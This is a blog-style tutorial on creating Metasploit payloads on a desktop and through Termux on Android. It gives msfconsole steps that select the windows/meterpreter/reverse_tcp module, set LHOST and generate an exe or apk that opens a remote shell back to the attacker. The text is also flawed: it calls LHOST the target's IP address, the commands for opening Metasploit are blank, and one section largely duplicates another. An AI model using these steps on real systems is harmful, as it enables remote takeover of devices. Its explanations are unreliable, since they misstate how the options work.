
How to Create Payload in Metasploit

Metasploit is a powerful tool used by ethical hackers to test and secure computer systems. It’s a versatile tool that can be used to create payloads, which are used to exploit vulnerabilities in target systems. In this article, we’ll cover the basics of how to create payload in Metasploit, types of payload, and show you how to create payloads using Termux and also give you some important Metasploit payload commands for your convenience.

Metasploit Payload Commands

Before we dive into creating payloads, let’s discuss some of the basic Metasploit payload commands:

use: This command is used to select the exploit or payload module.

set: It is used to set the values for various options like the payload type, target IP address, and port number.

show: This command is used to display information about the selected exploit or payload module.

run: It is used to run the selected exploit or payload module.

Types of Payloads

Metasploit supports different types of payloads, each with its unique set of features and capabilities. Some of the most commonly used payloads are:

Meterpreter: This is an advanced payload that provides a full-featured command-line interface to the target system.

Reverse Shell: This payload opens a connection to the attacker’s system, allowing them to execute commands on the target system.

Bind Shell: This payload opens a listener on the target system, allowing the attacker to connect and execute commands.

How to Create Payload in Metasploit

Creating payloads in Metasploit is a simple process that involves selecting a payload module, setting the required options, and running the module. Here are the steps to create a payload in Metasploit:

Step 1: Open Metasploit

Open Metasploit by running the following command in the terminal:


Step 2: Select a Payload Module

To create a payload, you need to select a payload module. To do this, run the following command:

use [payload_module_name]

Replace [payload_module_name] with the name of the payload module, you want to use. For example, to use the reverse TCP payload, you would run the following command:

use payload/windows/meterpreter/reverse_tcp

Step 3: Set the Required Options

Once you’ve selected the payload module, you need to set the required options. You can view the available options by running the show options command. To set an option, use the set command followed by the name of the option and the value you want to set. For example, to set the target IP address, you would run the following command:

set LHOST [target_ip_address]

Replace [target_ip_address] with the IP address of the target system.

Step 4: Generate the Payload

Once you’ve set the required options, you can generate the payload by running the following command:

generate -f [output_format] -o [output_file_path]

Replace [output_format] with the format you want the payload to be in (e.g., exe, raw, apk) and [output_file_path] with the path where you want to save the payload.

How to Create Payload in Metasploit Using Termux

Termux is an Android terminal emulator and Linux environment app that allows you to use Metasploit on your Android device. Here are the steps to create a payload in Metasploit using Termux:

Step 1: Install Metasploit

Install Metasploit on your Android device by running the following command:

pkg install unstable-repo
pkg install metasploit

Step 2: Open Metasploit

Open Metasploit by running the following command in the terminal:


Step 3: Select a Payload Module

To create a payload, you need to select a payload module. To do this, run the following command:

use [payload_module_name]

Replace [payload_module_name] with the name of the payload module, you want to use. For example, to use the reverse TCP payload, you would run the following command:

use payload/windows/meterpreter/reverse_tcp

Step 4: Set the Required Options

Once you’ve selected the payload module, you need to set the required options. You can view the available options by running the show options command. To set an option, use the set command followed by the name of the option and the value you want to set. For example, to set the target IP address, you would run the following command:

set LHOST [target_ip_address]

Replace [target_ip_address] with the IP address of the target system.

Step 5: Generate the Payload

Once you’ve set the required options, you can generate the payload by running the following command:

generate -f [output_format] -o [output_file_path]

Replace [output_format] with the format you want the payload to be in (e.g., exe, raw, apk) and [output_file_path] with the path where you want to save the payload.


Creating payloads in Metasploit is a crucial step in performing successful penetration testing. By understanding the basic commands and options used in Metasploit, you can create payloads for various types of exploits and targets. Whether you’re using Metasploit on your desktop or on your Android device using Termux, the process of creating payloads remains the same. By following the steps outlined in this article, you can create payloads in Metasploit and test the security of your systems.

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